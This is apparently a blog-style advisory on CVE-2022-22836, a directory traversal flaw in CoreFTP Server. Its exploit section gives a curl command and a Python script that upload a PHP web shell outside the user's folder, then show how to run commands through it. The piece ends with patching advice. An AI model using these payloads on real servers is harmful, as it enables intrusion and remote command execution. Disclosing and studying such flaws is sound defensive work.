In the world of server security, even a small oversight can become a massive problem. CVE-2022-22836 is a clear example of this. It describes a directory traversal vulnerability in CoreFTP Server (prior to build 727). If you're running this server for file sharing or management, this write-up is a must-read.
What Is CVE-2022-22836?
CoreFTP Server is a popular Windows file server solution supporting FTP, SFTP, FTPS, and HTTP/S protocols. The vulnerability affects CoreFTP Server versions before build 727. It enables an attacker with valid credentials to create files virtually anywhere on the server filesystem—outside their allowed folder—using a modified HTTP PUT request.
This flaw is possible due to improper input sanitization on the file path sent in HTTP PUT requests. When the server receives a filename like ../../evil.txt, it doesn't clean it up. As a result, the server writes the file two directories above the intended root—outside the user's home directory.
Authenticated users (including those with limited access) can abuse this to
- Overwrite system/server files.
Escalate to full system compromise, especially on an insecure configuration.
> In short: If you let users upload files, even in a "sandbox", you must patch now!
Original Disclosure and Reference Links
- CoreFTP Changelog: https://www.coreftp.com/server/changelog.txt
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2022-22836
- Exploit Database #50795: https://www.exploit-db.com/exploits/50795
How Does the Exploit Work?
Let's walk through a simple attack. We'll use the popular command-line tool curl for this example.
The HTTP service is enabled on port 80.
Goal: Place a file named hack.php in the web server's root directory, not in the normal home.
By default, after logging in via the browser or FTP, you'd land in your home directory, say
C:\CoreFTP\Users\testuser\
Step 2: Craft Directory Traversal Payload
You want to escape to C:\CoreFTP\webroot\, the public HTTP folder.
You can traverse directories using ../ (dot-dot-slash). For Windows, / works the same as \ for web servers.
Here's the curl command
curl -u testuser:Password123 -X PUT "http://192.168.1.10:80/../webroot/hack.php"; --data "<?php echo shell_exec(\$_GET['cmd']); ?>"
What happens:
- The server fails to clean ../ from the path.
Now you can trigger it via browser:
http://192.168.1.10/hack.php?cmd=whoami
Below is a Python snippet showing a more generic attack
import requests
from requests.auth import HTTPBasicAuth
target = 'http://192.168.1.10:80/../../webroot/backdoor.php';
webshell = '<?php system($_GET["cmd"]); ?>'
resp = requests.put(
target,
auth=HTTPBasicAuth('testuser', 'Password123'),
data=webshell
)
if resp.status_code == 201 or resp.status_code == 200:
print('Shell uploaded successfully!')
else:
print('Upload failed:', resp.status_code)
After uploading, open
http://192.168.1.10/backdoor.php?cmd=whoami
Mitigation
Upgrade to CoreFTP Server build 727 or later! The vendor fixed this by sanitizing paths and rejecting attempts with directory traversal.
Short-term steps
- Disable HTTP/HTTPS file transfers unless absolutely needed.
Conclusion
Even if only authenticated users could exploit CVE-2022-22836, it's still a high-risk for internal abuse and privilege escalation. If you're running CoreFTP Server below build 727 and allow uploads—even in isolated folders—you risk an attacker breaking out and controlling your server.
Immediate action: Patch it!
Don't let simple mistakes open the door for a full compromise.
References
- CoreFTP Changelog
- NVD CVE-2022-22836
- Exploit-DB 50795
Stay secure, update your servers, and remember—never trust user input!
Timeline
Published on: 01/10/2022 14:12:00 UTC
Last modified on: 01/19/2022 16:15:00 UTC